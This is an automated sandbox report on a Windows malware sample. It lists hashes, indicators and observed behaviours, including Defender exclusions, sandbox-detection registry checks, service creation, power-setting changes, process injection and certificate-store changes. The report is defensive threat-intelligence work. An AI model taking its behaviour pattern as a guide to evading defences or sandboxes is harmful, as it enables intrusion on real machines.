Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2024 10:40
Static task
static1
Behavioral task
behavioral1
Sample
50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
Resource
win10v2004-20241007-en
General
-
Target
50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe
-
Size
5.2MB
-
MD5
3cae1f11044d2ca787824610a40f1696
-
SHA1
bf4af642f36e87b887f973f47a46bcb2e656c636
-
SHA256
50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
-
SHA512
0918a7876c39cf901e9a4128f456683d85d2564767600ce4536c9d0bcd4be1b380cad8fcdf6d0b96fd30e48a0f1e73e66df6d5f279fb31e5fe5ecca3e2f856a7
-
SSDEEP
98304:iAVs069jHTPkc8zU7Jr93Wu+ieSaCKFa/9hAYNS1gtgghI+lw:iMnUjzPkcyI93Wu+ieSaCKFRYNS1gtV8
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2912 created 616 2912 powershell.EXE 5 PID 388 created 616 388 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1280 powershell.exe 2940 powershell.exe 2912 powershell.EXE 388 powershell.EXE -
Creates new service(s) 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 2020 weiuemyrzjra.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4452 powercfg.exe 3280 powercfg.exe 4840 powercfg.exe 2360 powercfg.exe 3940 powercfg.exe 4228 powercfg.exe 3076 powercfg.exe 1284 powercfg.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\MRT.exe weiuemyrzjra.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\MRT.exe 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5056 set thread context of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 2912 set thread context of 1744 2912 powershell.EXE 122 PID 2020 set thread context of 4492 2020 weiuemyrzjra.exe 140 PID 2020 set thread context of 4756 2020 weiuemyrzjra.exe 141 PID 2020 set thread context of 3856 2020 weiuemyrzjra.exe 144 PID 388 set thread context of 2204 388 powershell.EXE 150 -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3900 sc.exe 4420 sc.exe 2112 sc.exe 1164 sc.exe 1068 sc.exe 4352 sc.exe 4048 sc.exe 2668 sc.exe 3068 sc.exe 4716 sc.exe 4612 sc.exe 1960 sc.exe 2292 sc.exe 4012 sc.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={028F791C-9EDF-47B3-B697-8CBCC2DA956D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 2940 powershell.exe 2940 powershell.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 2020 weiuemyrzjra.exe 2912 powershell.EXE 2912 powershell.EXE 1280 powershell.exe 1280 powershell.exe 2912 powershell.EXE 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 2020 weiuemyrzjra.exe 1744 dllhost.exe 1744 dllhost.exe 388 powershell.EXE 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 388 powershell.EXE 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 388 powershell.EXE 1744 dllhost.exe 1744 dllhost.exe 3856 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2940 powershell.exe Token: SeShutdownPrivilege 3076 powercfg.exe Token: SeCreatePagefilePrivilege 3076 powercfg.exe Token: SeShutdownPrivilege 2360 powercfg.exe Token: SeCreatePagefilePrivilege 2360 powercfg.exe Token: SeShutdownPrivilege 4228 powercfg.exe Token: SeCreatePagefilePrivilege 4228 powercfg.exe Token: SeShutdownPrivilege 3940 powercfg.exe Token: SeCreatePagefilePrivilege 3940 powercfg.exe Token: SeDebugPrivilege 2912 powershell.EXE Token: SeDebugPrivilege 1280 powershell.exe Token: SeDebugPrivilege 2912 powershell.EXE Token: SeDebugPrivilege 1744 dllhost.exe Token: SeLockMemoryPrivilege 3856 dialer.exe Token: SeShutdownPrivilege 4452 powercfg.exe Token: SeCreatePagefilePrivilege 4452 powercfg.exe Token: SeShutdownPrivilege 3280 powercfg.exe Token: SeCreatePagefilePrivilege 3280 powercfg.exe Token: SeShutdownPrivilege 4840 powercfg.exe Token: SeCreatePagefilePrivilege 4840 powercfg.exe Token: SeShutdownPrivilege 1284 powercfg.exe Token: SeCreatePagefilePrivilege 1284 powercfg.exe Token: SeDebugPrivilege 388 powershell.EXE Token: SeAssignPrimaryTokenPrivilege 2344 svchost.exe Token: SeIncreaseQuotaPrivilege 2344 svchost.exe Token: SeSecurityPrivilege 2344 svchost.exe Token: SeTakeOwnershipPrivilege 2344 svchost.exe Token: SeLoadDriverPrivilege 2344 svchost.exe Token: SeSystemtimePrivilege 2344 svchost.exe Token: SeBackupPrivilege 2344 svchost.exe Token: SeRestorePrivilege 2344 svchost.exe Token: SeShutdownPrivilege 2344 svchost.exe Token: SeSystemEnvironmentPrivilege 2344 svchost.exe Token: SeUndockPrivilege 2344 svchost.exe Token: SeManageVolumePrivilege 2344 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2344 svchost.exe Token: SeIncreaseQuotaPrivilege 2344 svchost.exe Token: SeSecurityPrivilege 2344 svchost.exe Token: SeTakeOwnershipPrivilege 2344 svchost.exe Token: SeLoadDriverPrivilege 2344 svchost.exe Token: SeSystemtimePrivilege 2344 svchost.exe Token: SeBackupPrivilege 2344 svchost.exe Token: SeRestorePrivilege 2344 svchost.exe Token: SeShutdownPrivilege 2344 svchost.exe Token: SeSystemEnvironmentPrivilege 2344 svchost.exe Token: SeUndockPrivilege 2344 svchost.exe Token: SeManageVolumePrivilege 2344 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2344 svchost.exe Token: SeIncreaseQuotaPrivilege 2344 svchost.exe Token: SeSecurityPrivilege 2344 svchost.exe Token: SeTakeOwnershipPrivilege 2344 svchost.exe Token: SeLoadDriverPrivilege 2344 svchost.exe Token: SeSystemtimePrivilege 2344 svchost.exe Token: SeBackupPrivilege 2344 svchost.exe Token: SeRestorePrivilege 2344 svchost.exe Token: SeShutdownPrivilege 2344 svchost.exe Token: SeSystemEnvironmentPrivilege 2344 svchost.exe Token: SeUndockPrivilege 2344 svchost.exe Token: SeManageVolumePrivilege 2344 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2344 svchost.exe Token: SeIncreaseQuotaPrivilege 2344 svchost.exe Token: SeSecurityPrivilege 2344 svchost.exe Token: SeTakeOwnershipPrivilege 2344 svchost.exe Token: SeLoadDriverPrivilege 2344 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1476 wrote to memory of 4588 1476 cmd.exe 88 PID 1476 wrote to memory of 4588 1476 cmd.exe 88 PID 5056 wrote to memory of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 5056 wrote to memory of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 5056 wrote to memory of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 5056 wrote to memory of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 5056 wrote to memory of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 5056 wrote to memory of 4068 5056 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251_Sigmanly.exe 102 PID 4940 wrote to memory of 1796 4940 cmd.exe 118 PID 4940 wrote to memory of 1796 4940 cmd.exe 118 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 2912 wrote to memory of 1744 2912 powershell.EXE 122 PID 1744 wrote to memory of 616 1744 dllhost.exe 5 PID 1744 wrote to memory of 680 1744 dllhost.exe 7 PID 1744 wrote to memory of 960 1744 dllhost.exe 12 PID 1744 wrote to memory of 60 1744 dllhost.exe 13 PID 1744 wrote to memory of 512 1744 dllhost.exe 14 PID 1744 wrote to memory of 1020 1744 dllhost.exe 15 PID 1744 wrote to memory of 1056 1744 dllhost.exe 16 PID 1744 wrote to memory of 1076 1744 dllhost.exe 17 PID 1744 wrote to memory of 1132 1744 dllhost.exe 18 PID 1744 wrote to memory of 1208 1744 dllhost.exe 20 PID 1744 wrote to memory of 1248 1744 dllhost.exe 21 PID 1744 wrote to memory of 1336 1744 dllhost.exe 22 PID 1744 wrote to memory of 1428 1744 dllhost.exe 23 PID 1744 wrote to memory of 1436 1744 dllhost.exe 24 PID 1744 wrote to memory of 1452 1744 dllhost.exe 25 PID 1744 wrote to memory of 1484 1744 dllhost.exe 26 PID 1744 wrote to memory of 1504 1744 dllhost.exe 27 PID 1744 wrote to memory of 1616 1744 dllhost.exe 28 PID 1744 wrote to memory of 1700 1744 dllhost.exe 29 PID 1744 wrote to memory of 1708 1744 dllhost.exe 30 PID 1744 wrote to memory of 1804 1744 dllhost.exe 31 PID 1744 wrote to memory of 1868 1744 dllhost.exe 32 PID 1744 wrote to memory of 1880 1744 dllhost.exe 33 PID 1744 wrote to memory of 1892 1744 dllhost.exe 34 PID 1744 wrote to memory of 1904 1744 dllhost.exe 35 PID 1744 wrote to memory of 1964 1744 dllhost.exe 36 PID 1744 wrote to memory of 1356 1744 dllhost.exe 37 PID 1744 wrote to memory of 2036 1744 dllhost.exe 39 PID 1744 wrote to memory of 2208 1744 dllhost.exe 40 PID 1744 wrote to memory of 2216 1744 dllhost.exe 41 PID 1744 wrote to memory of 2300 1744 dllhost.exe 42 PID 1744 wrote to memory of 2344 1744 dllhost.exe 43 PID 1744 wrote to memory of 2352 1744 dllhost.exe 44 PID 1744 wrote to memory of 2392 1744 dllhost.exe 45 PID 1744 wrote to memory of 2412 1744 dllhost.exe 46 PID 1744 wrote to memory of 2464 1744 dllhost.exe 47 PID 680 wrote to memory of 2412 680 lsass.exe 46 PID 680 wrote to memory of 2412 680 lsass.exe 46 PID 680 wrote to memory of 2412 680 lsass.exe 46 PID 680 wrote to memory of 2412 680 lsass.exe 46 PID 1744 wrote to memory of 2476 1744 dllhost.exe 48 PID 3084 wrote to memory of 3388 3084 cmd.exe 127 PID 3084 wrote to memory of 3388 3084 cmd.exe 127 PID 680 wrote to memory of 2412 680 lsass.exe 46 PID 1744 wrote to memory of 2968 1744 dllhost.exe 49 PID 1744 wrote to memory of 2988 1744 dllhost.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3ca38b68-03aa-4677-8d9f-1550f22f2c45}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{87d0514b-653e-42c7-b6d9-e6ada437fc38}2⤵PID:2204
-
-
